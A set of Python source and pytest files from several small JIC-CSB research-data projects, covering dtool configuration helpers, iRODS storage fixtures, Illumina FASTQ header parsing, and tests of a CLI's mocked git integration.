def _get_config_dict_from_file(config_path=None):
"""Return value if key exists in file.
Return empty string ("") if key or file does not exist.
"""
if config_path is None:
config_path = DEFAULT_CONFIG_PATH
# Default (empty) content will be used if config file does not exist.
config_content = {}
# If the config file exists we use that content.
if os.path.isfile(config_path):
with open(config_path) as fh:
config_content = json.load(fh)
return config_content
def write_config_value_to_file(key, value, config_path=None):
"""Write key/value pair to config file.
"""
if config_path is None:
config_path = DEFAULT_CONFIG_PATH
# Get existing config.
config = _get_config_dict_from_file(config_path)
# Add/update the key/value pair.
config[key] = value
# Create parent directories if they are missing.
mkdir_parents(os.path.dirname(config_path))
# Write the content
with open(config_path, "w") as fh:
json.dump(config, fh, sort_keys=True, indent=2)
# Restrict the config file permissions to the owner only (33216 == 0o100700).
os.chmod(config_path, 33216)
return get_config_value_from_file(key, config_path)
def get_config_value_from_file(key, config_path=None, default=None):
"""Return value if key exists in file.
Return default if key not in config.
"""
config = _get_config_dict_from_file(config_path)
if key not in config:
return default
return config[key]
def get_config_value(key, config_path=None, default=None):
"""Get a configuration value.
Preference:
1. From environment
2. From JSON configuration file supplied in ``config_path`` argument
3. The default supplied to the function
:param key: name of lookup value
:param config_path: path to JSON configuration file
:param default: default fall back value
:returns: value associated with the key
"""
if config_path is None:
config_path = DEFAULT_CONFIG_PATH
# Start by setting default value
value = default
# Update from config file
value = get_config_value_from_file(
key=key,
config_path=config_path,
default=value
)
# Update from environment variable
value = os.environ.get(key, value)
return value
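# Minimal usage sketch (illustrative, not part of the original module):
# the environment variable wins over the config file, which wins over the
# supplied default. DTOOL_DEMO_KEY is a made-up key used only here.
def _demo_get_config_value():
    os.environ["DTOOL_DEMO_KEY"] = "from-env"
    try:
        assert get_config_value("DTOOL_DEMO_KEY", default="fallback") == "from-env"
    finally:
        del os.environ["DTOOL_DEMO_KEY"]
    assert get_config_value("DTOOL_DEMO_KEY", default="fallback") == "fallback"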
def sha1_hexdigest(input_string):
"""Return hex digest of the sha1sum of the input_string."""
byte_string = input_string.encode()
return hashlib.sha1(byte_string).hexdigest()
def base64_to_hex(input_string):
"""Retun the hex encoded version of the base64 encoded input string."""
return binascii.hexlify(base64.b64decode(input_string)).decode()
def generate_identifier(handle):
"""Return identifier from a ProtoDataSet handle."""
return sha1_hexdigest(handle)
def mkdir_parents(path):
"""Create the given directory path.
This includes all necessary parent directories. Does not raise an error if
the directory already exists.
:param path: path to create
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
def timestamp(datetime_obj):
"""Return Unix timestamp as float.
The number of seconds that have elapsed since January 1, 1970.
"""
start_of_time = datetime.datetime(1970, 1, 1)
diff = datetime_obj - start_of_time
return diff.total_seconds()
def name_is_valid(name):
"""Return True if the dataset name is valid.
The name can only be 80 characters long.
Valid characters: Alpha numeric characters [0-9a-zA-Z]
Valid special characters: - _ .
"""
# The name can only be 80 characters long.
if len(name) > MAX_NAME_LENGTH:
return False
return bool(NAME_VALID_CHARS_REGEX.match(name))
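# Minimal usage sketch (illustrative, not part of the original module).
def _demo_name_is_valid():
    assert name_is_valid("my_dataset-v1.0")
    assert not name_is_valid("my dataset")  # spaces are not allowed
    assert not name_is_valid("x" * (MAX_NAME_LENGTH + 1))  # too long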
def relpath_to_handle(relpath, is_windows=False):
"""Return handle from relpath.
Handles are Unix style relpaths.
Converts Windows relpath to Unix style relpath.
Strips "./" prefix.
"""
if is_windows:
relpath = windows_to_unix_path(relpath)
if relpath.startswith("./"):
relpath = relpath[2:]
return relpath
def handle_to_osrelpath(handle, is_windows=False):
"""Return OS specific relpath from handle."""
directories = handle.split("/")
if is_windows:
return "\\".join(directories)
return "/".join(directories)
``` |
{
"source": "JIC-CSB/dtool-irods",
"score": 2
} |
#### File: dtool-irods/tests/__init__.py
```python
import os
import shutil
import tempfile
import string
import random
from contextlib import contextmanager
import pytest
from dtoolcore import generate_admin_metadata
from dtool_irods.storagebroker import (
_mkdir,
_rm_if_exists,
IrodsStorageBroker,
)
_HERE = os.path.dirname(__file__)
TEST_SAMPLE_DATA = os.path.join(_HERE, "data")
TEST_ZONE = "/jic_overflow/dtool-testing"
@contextmanager
def tmp_env_var(key, value):
os.environ[key] = value
yield
del os.environ[key]
@contextmanager
def tmp_directory():
d = tempfile.mkdtemp()
yield d
shutil.rmtree(d)
def random_string(
size=9,
chars=string.ascii_uppercase + string.ascii_lowercase + string.digits
):
return ''.join(random.choice(chars) for _ in range(size))
@pytest.fixture
def chdir_fixture(request):
d = tempfile.mkdtemp()
curdir = os.getcwd()
os.chdir(d)
@request.addfinalizer
def teardown():
os.chdir(curdir)
shutil.rmtree(d)
@pytest.fixture
def tmp_dir_fixture(request):
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def local_tmp_dir_fixture(request):
d = tempfile.mkdtemp(dir=_HERE)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def tmp_uuid_and_uri(request):
admin_metadata = generate_admin_metadata("test_dataset")
uuid = admin_metadata["uuid"]
base_uri = "irods:" + TEST_ZONE
uri = IrodsStorageBroker.generate_uri("test_dataset", uuid, base_uri)
@request.addfinalizer
def teardown():
_, irods_path = uri.split(":", 1)
_rm_if_exists(irods_path)
return (uuid, uri)
@pytest.fixture
def tmp_irods_base_uri_fixture(request):
collection = os.path.join(TEST_ZONE, random_string())
_mkdir(collection)
@request.addfinalizer
def teardown():
_rm_if_exists(collection)
return "irods:" + collection
```
#### File: dtool-irods/tests/test_IrodsStorageBroker_list_dataset_uris.py
```python
from . import tmp_irods_base_uri_fixture # NOQA
def test_list_dataset_uris(tmp_irods_base_uri_fixture): # NOQA
import dtoolcore
from dtool_irods.storagebroker import IrodsStorageBroker
assert [] == IrodsStorageBroker.list_dataset_uris(
base_uri=tmp_irods_base_uri_fixture,
config_path=None
)
# Create two datasets to be copied.
expected_uris = []
for name in ["test_ds_1", "test_ds_2"]:
admin_metadata = dtoolcore.generate_admin_metadata(name)
proto_dataset = dtoolcore.generate_proto_dataset(
admin_metadata=admin_metadata,
base_uri=tmp_irods_base_uri_fixture
)
proto_dataset.create()
expected_uris.append(proto_dataset.uri)
actual_uris = IrodsStorageBroker.list_dataset_uris(
base_uri=tmp_irods_base_uri_fixture,
config_path=None
)
assert set(expected_uris) == set(actual_uris)
```
#### File: dtool-irods/tests/test_self_description.py
```python
import os
from . import tmp_uuid_and_uri # NOQA
def test_writing_of_dtool_structure_file(tmp_uuid_and_uri): # NOQA
from dtoolcore import ProtoDataSet, generate_admin_metadata
from dtoolcore.utils import generous_parse_uri
from dtool_irods.storagebroker import _path_exists, _get_obj, __version__
# Create a proto dataset.
uuid, dest_uri = tmp_uuid_and_uri
name = "test_dtool_structure_file"
admin_metadata = generate_admin_metadata(name)
admin_metadata["uuid"] = uuid
proto_dataset = ProtoDataSet(
uri=dest_uri,
admin_metadata=admin_metadata,
config_path=None
)
proto_dataset.create()
# Check that the ".dtool/structure.json" file exists.
expected_irods_path = os.path.join(
generous_parse_uri(dest_uri).path,
".dtool",
"structure.json"
)
assert _path_exists(expected_irods_path)
expected_content = {
"data_directory": ["data"],
"dataset_readme_relpath": ["README.yml"],
"dtool_directory": [".dtool"],
"admin_metadata_relpath": [".dtool", "dtool"],
"structure_metadata_relpath": [".dtool", "structure.json"],
"dtool_readme_relpath": [".dtool", "README.txt"],
"manifest_relpath": [".dtool", "manifest.json"],
"overlays_directory": [".dtool", "overlays"],
"annotations_directory": [".dtool", "annotations"],
"tags_directory": [".dtool", "tags"],
"metadata_fragments_directory": [".dtool", "tmp_fragments"],
"storage_broker_version": __version__,
}
actual_content = _get_obj(expected_irods_path)
assert expected_content == actual_content
def test_writing_of_dtool_readme_file(tmp_uuid_and_uri): # NOQA
from dtoolcore import ProtoDataSet, generate_admin_metadata
from dtoolcore.utils import generous_parse_uri
from dtool_irods.storagebroker import _path_exists, _get_text
# Create a proto dataset.
uuid, dest_uri = tmp_uuid_and_uri
name = "test_dtool_readme_file"
admin_metadata = generate_admin_metadata(name)
admin_metadata["uuid"] = uuid
proto_dataset = ProtoDataSet(
uri=dest_uri,
admin_metadata=admin_metadata,
config_path=None
)
proto_dataset.create()
# Check that the ".dtool/README.txt" file exists.
expected_irods_path = os.path.join(
generous_parse_uri(dest_uri).path,
".dtool",
"README.txt"
)
assert _path_exists(expected_irods_path)
actual_content = _get_text(expected_irods_path)
assert actual_content.startswith("README")
``` |
{
"source": "JIC-CSB/dtoolsid",
"score": 3
} |
#### File: dtoolsid/dtoolsid/illumina.py
```python
import os
import gzip
from dtoolsid.utils import is_file_extension_in_list
def parse_fastq_title_line(fastq_title_line):
def illumina_bool(x):
if x == "Y":
return True
if x == "N":
return False
raise(ValueError)
component_names = [
("instrument", str),
("run_number", int),
("flowcell_id", str),
("lane", int),
("tile", int),
("x_pos", int),
("y_pos", int),
("read", int),
("is_filtered", illumina_bool),
("control_number", int),
("index_sequence", str)
]
assert fastq_title_line[0] == '@'
words = fastq_title_line[1:].split(" ")
assert len(words) == 2
components = words[0].split(":") + words[1].split(":")
assert len(components) == len(component_names)
# We were going through a functional phase
return {
name: cast_func(component)
for (name, cast_func), component
in zip(component_names, components)
}
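# Minimal usage sketch (illustrative, not part of the original module); the
# title line matches the one used in the package's own test data.
def _demo_parse_fastq_title_line():
    title = "@ST-E00317:319:HJMGJALXX:2:1101:7750:1309 1:N:0:NGTCACTA"
    parsed = parse_fastq_title_line(title)
    assert parsed["instrument"] == "ST-E00317"
    assert parsed["lane"] == 2
    assert parsed["is_filtered"] is False
    return parsed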
def extract_metadata_from_fastq_file_object(fh):
first_line = fh.readline().strip()
try:
first_line = first_line.decode('utf-8')
except AttributeError:
pass
return parse_fastq_title_line(first_line)
def extract_metadata_from_fastq_file(filename):
try:
with open(filename) as fh:
metadata = extract_metadata_from_fastq_file_object(fh)
except UnicodeDecodeError:
with gzip.open(filename, 'rb') as fh:
metadata = extract_metadata_from_fastq_file_object(fh)
return metadata
def create_illumina_metadata_overlay(dataset):
"""Create overlay derived from Illumina FQ metadata, and write it to
dataset."""
illumina_metadata_overlay = dataset.empty_overlay()
for identifier in dataset.identifiers:
abspath = dataset.abspath_from_identifier(identifier)
if is_file_extension_in_list(abspath, ['fq', 'fq.gz']):
metadata = extract_metadata_from_fastq_file(abspath)
illumina_metadata_overlay[identifier] = metadata
dataset.persist_overlay(
"illumina_metadata",
illumina_metadata_overlay
)
```
#### File: dtoolsid/tests/__init__.py
```python
import os
import shutil
import tempfile
import pytest
import dtoolcore
_HERE = os.path.dirname(__file__)
ILLUMINA_DATASET_PATH = os.path.join(_HERE, 'data', 'illumina_test_data')
@pytest.fixture
def chdir_fixture(request):
d = tempfile.mkdtemp()
curdir = os.getcwd()
os.chdir(d)
@request.addfinalizer
def teardown():
os.chdir(curdir)
shutil.rmtree(d)
@pytest.fixture
def tmp_dir_fixture(request):
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def local_tmp_dir_fixture(request):
d = tempfile.mkdtemp(dir=_HERE)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def tmp_illumina_dataset(request):
d = tempfile.mkdtemp()
subd = os.path.join(d, 'sub')
shutil.copytree(ILLUMINA_DATASET_PATH, subd)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return dtoolcore.DataSet.from_path(subd)
@pytest.fixture
def tmp_illumina_dataset_directory(request):
d = tempfile.mkdtemp()
subd = os.path.join(d, 'sub')
shutil.copytree(ILLUMINA_DATASET_PATH, subd)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return subd
@pytest.fixture
def dataset_fixture(request):
d = tempfile.mkdtemp()
dataset = dtoolcore.DataSet("test", "data")
dataset.persist_to_path(d)
for s in ["hello", "world"]:
fname = s + ".txt"
fpath = os.path.join(d, "data", fname)
with open(fpath, "w") as fh:
fh.write(s)
dataset.update_manifest()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def collection_fixture(request):
collection_path = tempfile.mkdtemp()
collection = dtoolcore.Collection()
collection.persist_to_path(collection_path)
for ds_name in ["rice", "wheat", "barley"]:
ds_path = os.path.join(collection_path, ds_name)
os.mkdir(ds_path)
dataset = dtoolcore.DataSet(ds_name, "data")
dataset.persist_to_path(ds_path)
for s in ["sow", "grow", "harvest"]:
fname = s + ".txt"
fpath = os.path.join(ds_path, "data", fname)
with open(fpath, "w") as fh:
fh.write("{} {}\n".format(s, ds_name))
dataset.update_manifest()
@request.addfinalizer
def teardown():
shutil.rmtree(collection_path)
return collection_path
```
#### File: dtoolsid/tests/test_illumina.py
```python
from . import tmp_illumina_dataset # NOQA
def test_tmp_dataset_fixture(tmp_illumina_dataset): # NOQA
assert len(tmp_illumina_dataset.identifiers) == 4
def check_fastq_read_1_sample_result(result):
assert result["instrument"] == "ST-E00317"
assert result["run_number"] == 319
assert result["flowcell_id"] == "HJMGJALXX"
assert result["lane"] == 2
assert result["tile"] == 1101
assert result["x_pos"] == 7750
assert result["y_pos"] == 1309
assert result["read"] == 1
assert result["is_filtered"] is False
assert result["control_number"] == 0
assert result["index_sequence"] == "NGTCACTA"
def test_parse_fastq_title_line():
sample_title_line = \
"@ST-E00317:319:HJMGJALXX:2:1101:7750:1309 1:N:0:NGTCACTA"
from dtoolsid.illumina import parse_fastq_title_line
result = parse_fastq_title_line(sample_title_line)
check_fastq_read_1_sample_result(result)
def test_parse_fastq_title_line_sample_num_edge_case():
from dtoolsid.illumina import parse_fastq_title_line
sample_title_line = \
"@ST-E00317:319:HJMGJALXX:2:1101:7750:1309 1:N:0:NGTCACTA"
result = parse_fastq_title_line(sample_title_line)
assert result["index_sequence"] == "NGTCACTA"
sample_title_line = \
"@ST-E00317:319:HJMGJALXX:2:1101:7750:1309 1:N:0:2"
result = parse_fastq_title_line(sample_title_line)
assert result["index_sequence"] == "2"
def test_extract_metadata_from_fastq_file_object(tmp_illumina_dataset): # NOQA
from dtoolsid.illumina import extract_metadata_from_fastq_file_object
fastq_file_identifier = "42889f278935f206dcf2772c81a055b338844c48"
fastq_filename = tmp_illumina_dataset.abspath_from_identifier(
fastq_file_identifier
)
with open(fastq_filename) as fh:
result = extract_metadata_from_fastq_file_object(fh)
check_fastq_read_1_sample_result(result)
def test_extract_metadata_from_fastq_file(tmp_illumina_dataset): # NOQA
from dtoolsid.illumina import extract_metadata_from_fastq_file
# Test plaintext fastq file
fastq_file_identifier = "42889f278935f206dcf2772c81a055b338844c48"
fastq_filename = tmp_illumina_dataset.abspath_from_identifier(
fastq_file_identifier
)
result = extract_metadata_from_fastq_file(fastq_filename)
check_fastq_read_1_sample_result(result)
# Test a gzipped fastq file
fastq_gz_file_identifier = "40ed0c9553797c66cfa07cefb37af9086a5da66b"
fastq_gz_filename = tmp_illumina_dataset.abspath_from_identifier(
fastq_gz_file_identifier
)
result = extract_metadata_from_fastq_file(fastq_gz_filename)
check_fastq_read_1_sample_result(result)
def test_create_illumina_metadata_overlay(tmp_illumina_dataset): # NOQA
from dtoolsid.illumina import create_illumina_metadata_overlay
create_illumina_metadata_overlay(tmp_illumina_dataset)
overlays = tmp_illumina_dataset.access_overlays()
assert "illumina_metadata" in overlays
first_identifier = "42889f278935f206dcf2772c81a055b338844c48"
first_metadata = overlays["illumina_metadata"][first_identifier]
check_fastq_read_1_sample_result(first_metadata)
first_gz_identifier = "40ed0c9553797c66cfa07cefb37af9086a5da66b"
first_gz_metadata = overlays["illumina_metadata"][first_gz_identifier]
check_fastq_read_1_sample_result(first_gz_metadata)
``` |
{
"source": "JIC-CSB/dtoolutils",
"score": 2
} |
#### File: dtoolutils/tests/__init__.py
```python
import os
import shutil
import tempfile
import pytest
_HERE = os.path.dirname(__file__)
TEST_SAMPLE_DATASET = os.path.join(_HERE, "data", "sample_data")
@pytest.fixture
def chdir_fixture(request):
d = tempfile.mkdtemp()
curdir = os.getcwd()
os.chdir(d)
@request.addfinalizer
def teardown():
os.chdir(curdir)
shutil.rmtree(d)
@pytest.fixture
def tmp_dir_fixture(request):
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def tmp_dataset_fixture(request):
from dtoolcore import DataSet
d = tempfile.mkdtemp()
dataset_path = os.path.join(d, 'sample_data')
shutil.copytree(TEST_SAMPLE_DATASET, dataset_path)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return DataSet.from_path(dataset_path)
@pytest.fixture
def local_tmp_dir_fixture(request):
d = tempfile.mkdtemp(dir=_HERE)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
``` |
{
"source": "JIC-CSB/jicagile",
"score": 2
} |
#### File: jicagile/tests/git_integration_tests.py
```python
import unittest
import os
import os.path
import shutil
from subprocess import Popen, PIPE
import tempfile
import mock
CUR_DIR = os.getcwd()
class GitIntegrationTests(unittest.TestCase):

    def setUp(self):
        self.tmp_dir = tempfile.mkdtemp()
        if not os.path.isdir(self.tmp_dir):
            os.mkdir(self.tmp_dir)
        os.chdir(self.tmp_dir)

    def tearDown(self):
        os.chdir(CUR_DIR)
        shutil.rmtree(self.tmp_dir)

    def test_edit_without_git(self):
        import jicagile
        from jicagile.cli import CLI
        cli = CLI()

        args = cli.parse_args(["add", "Basic task", "1"])
        cli.run(args)

        backlog_dir = os.path.join(self.tmp_dir, "backlog")
        task_fpath = os.path.join(backlog_dir, "basic-task.yml")

        team = jicagile.config.Team()
        team.add_member("TO", "Tjelvar", "Olsson")
        team.add_member("MH", "Matthew", "Hartley")
        cli.project.team = team

        themes = jicagile.config.Themes()
        themes.add_member("admin", "grants, appraisals, etc")
        cli.project.themes = themes

        args = cli.parse_args(["edit",
                               task_fpath,
                               "-s", "3",
                               "-p", "TO",
                               "-e", "admin"])
        cli.run(args)

        task_from_file = jicagile.Task.from_file(task_fpath)
        self.assertEqual(task_from_file["title"], "Basic task")
        self.assertEqual(task_from_file["storypoints"], 3)
        self.assertEqual(task_from_file["primary_contact"], "TO")
        self.assertEqual(task_from_file["theme"], "admin")

    @mock.patch('subprocess.Popen')
    def test_edit_with_git(self, patch_popen):
        process_mock = mock.MagicMock()
        attrs = {"communicate.return_value": None}
        process_mock.configure_mock(**attrs)
        patch_popen.return_value = process_mock

        import jicagile
        from jicagile.cli import CLI
        cli = CLI()

        args = cli.parse_args(["add", "Basic task", "1"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = False  # We are not testing integration here.
            cli.run(args)

        backlog_dir = os.path.join(self.tmp_dir, "backlog")
        task_fpath = os.path.join(backlog_dir, "basic-task.yml")

        args = cli.parse_args(["edit", task_fpath, "-s", "3"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = True  # We are testing integration here.
            cli.run(args)

        patch_popen.assert_called_with(["git", "add", task_fpath])
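
    # Note: the *_with_git tests follow the same pattern: is_git_repo is
    # mocked to return True and the patched subprocess.Popen is then
    # inspected to check that the expected git command was issued.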
    def test_edit_title_without_git(self):
        import jicagile
        from jicagile.cli import CLI
        cli = CLI()

        args = cli.parse_args(["add", "Basic task", "1"])
        cli.run(args)

        backlog_dir = os.path.join(self.tmp_dir, "backlog")
        org_task_fpath = os.path.join(backlog_dir, "basic-task.yml")
        new_task_fpath = os.path.join(backlog_dir, "complicated-task.yml")
        self.assertTrue(os.path.isfile(org_task_fpath))
        self.assertFalse(os.path.isfile(new_task_fpath))

        args = cli.parse_args(["edit",
                               org_task_fpath,
                               "-t", "Complicated task"])
        cli.run(args)

        self.assertFalse(os.path.isfile(org_task_fpath))
        self.assertTrue(os.path.isfile(new_task_fpath))

        task_from_file = jicagile.Task.from_file(new_task_fpath)
        self.assertEqual(task_from_file["title"], "Complicated task")

    @mock.patch('subprocess.Popen')
    def test_edit_title_with_git(self, patch_popen):
        process_mock = mock.MagicMock()
        attrs = {"communicate.return_value": None}
        process_mock.configure_mock(**attrs)
        patch_popen.return_value = process_mock

        import jicagile
        from jicagile.cli import CLI
        cli = CLI()

        args = cli.parse_args(["add", "Basic task", "1"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = False  # Just creating a task to work with, not testing git integration.
            cli.run(args)

        backlog_dir = os.path.join(self.tmp_dir, "backlog")
        org_task_fpath = os.path.join(backlog_dir, "basic-task.yml")
        new_task_fpath = os.path.join(backlog_dir, "complicated-task.yml")
        self.assertTrue(os.path.isfile(org_task_fpath))
        self.assertFalse(os.path.isfile(new_task_fpath))

        args = cli.parse_args(["edit",
                               org_task_fpath,
                               "-t", "Complicated task"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = True  # This is where we test git integration.
            cli.run(args)

        calls = [mock.call(["git", "add", org_task_fpath]),
                 mock.call(["git", "mv", org_task_fpath, new_task_fpath])]
        self.assertEqual(patch_popen.call_args_list, calls)
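
    # Note: test_is_git_repo below is not mocked; it runs a real "git init"
    # in the temporary directory, so git must be available on the PATH.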
    def test_is_git_repo(self):
        from jicagile.cli import CLI
        cli = CLI()
        self.assertFalse(cli.is_git_repo)

        process = Popen(["git", "init"], stdout=PIPE, stderr=PIPE)
        stdout, stderr = process.communicate()
        self.assertTrue(cli.is_git_repo)
    @mock.patch('subprocess.Popen')
    def test_add_without_git(self, patch_popen):
        process_mock = mock.MagicMock()
        attrs = {"communicate.return_value": None}
        process_mock.configure_mock(**attrs)
        patch_popen.return_value = process_mock

        from jicagile.cli import CLI
        cli = CLI()
        args = cli.parse_args(["add", "Simple task", "1"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = False
            cli.run(args)

        patch_popen.assert_not_called()

    @mock.patch('subprocess.Popen')
    def test_add_with_git(self, patch_popen):
        process_mock = mock.MagicMock()
        attrs = {"communicate.return_value": None}
        process_mock.configure_mock(**attrs)
        patch_popen.return_value = process_mock

        from jicagile.cli import CLI
        cli = CLI()
        args = cli.parse_args(["add", "Simple task", "1"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = True
            cli.run(args)

        fpath = os.path.join(".", "backlog", "simple-task.yml")
        patch_popen.assert_called_with(["git", "add", fpath])

    @mock.patch('subprocess.Popen')
    def test_mv_without_git(self, patch_popen):
        process_mock = mock.MagicMock()
        attrs = {"communicate.return_value": None}
        process_mock.configure_mock(**attrs)
        patch_popen.return_value = process_mock

        from jicagile.cli import CLI
        cli = CLI()
        args = cli.parse_args(["mv", "path/to/move", "/dest/"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = False
            cli.run(args)

        patch_popen.assert_called_with(["mv", "path/to/move", "/dest/"])

    @mock.patch('subprocess.Popen')
    def test_mv_with_git(self, patch_popen):
        process_mock = mock.MagicMock()
        attrs = {"communicate.return_value": None}
        process_mock.configure_mock(**attrs)
        patch_popen.return_value = process_mock

        from jicagile.cli import CLI
        cli = CLI()
        args = cli.parse_args(["mv", "path/to/move", "/dest/"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = True
            cli.run(args)

        patch_popen.assert_called_with(["git", "mv", "path/to/move", "/dest/"])
    @mock.patch('subprocess.Popen')
    def test_theme_without_git(self, patch_popen):
        process_mock = mock.MagicMock()
        attrs = {"communicate.return_value": None}
        process_mock.configure_mock(**attrs)
        patch_popen.return_value = process_mock

        from jicagile.cli import CLI
        cli = CLI()
        args = cli.parse_args(["theme", "add", "admin", "stuff to do"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = False
            cli.run(args)

        patch_popen.assert_not_called()

    @mock.patch('subprocess.Popen')
    def test_theme_with_git(self, patch_popen):
        process_mock = mock.MagicMock()
        attrs = {"communicate.return_value": None}
        process_mock.configure_mock(**attrs)
        patch_popen.return_value = process_mock

        from jicagile.cli import CLI
        cli = CLI()
        args = cli.parse_args(["theme", "add", "admin", "stuff to do"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = True
            cli.run(args)

        fpath = os.path.join(".", ".themes.yml")
        patch_popen.assert_called_with(["git", "add", fpath])

    @mock.patch('subprocess.Popen')
    def test_teammember_without_git(self, patch_popen):
        process_mock = mock.MagicMock()
        attrs = {"communicate.return_value": None}
        process_mock.configure_mock(**attrs)
        patch_popen.return_value = process_mock

        from jicagile.cli import CLI
        cli = CLI()
        args = cli.parse_args(["teammember", "add", "TO", "Tjelvar", "Olsson"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = False
            cli.run(args)

        patch_popen.assert_not_called()

    @mock.patch('subprocess.Popen')
    def test_teammember_with_git(self, patch_popen):
        process_mock = mock.MagicMock()
        attrs = {"communicate.return_value": None}
        process_mock.configure_mock(**attrs)
        patch_popen.return_value = process_mock

        from jicagile.cli import CLI
        cli = CLI()
        args = cli.parse_args(["teammember", "add", "TO", "Tjelvar", "Olsson"])
        with mock.patch("jicagile.cli.CLI.is_git_repo", new_callable=mock.PropertyMock) as mock_is_git_repo:
            mock_is_git_repo.return_value = True
            cli.run(args)

        fpath = os.path.join(".", ".team.yml")
        patch_popen.assert_called_with(["git", "add", fpath])
```
#### File: jicagile/tests/Theme_unit_tests.py
```python
import unittest


class ThemeUnitTests(unittest.TestCase):

    def test_initialisation(self):
        import jicagile.config
        themes = jicagile.config.Themes()
        self.assertEqual(len(themes), 0)

    def test_theme_member_initialisation(self):
        import jicagile.config
        theme = jicagile.config.Themes.Member("img", "bioimage analysis")
        self.assertEqual(theme.lookup, "img")
        self.assertEqual(theme.description, "bioimage analysis")

    def test_add_member_to_themes(self):
        import jicagile
        themes = jicagile.config.Themes()
        themes.add_member(lookup="img", description="bioimage analysis")
        self.assertEqual(len(themes), 1)
        self.assertTrue(isinstance(themes.member("img"), jicagile.config.Themes.Member))
``` |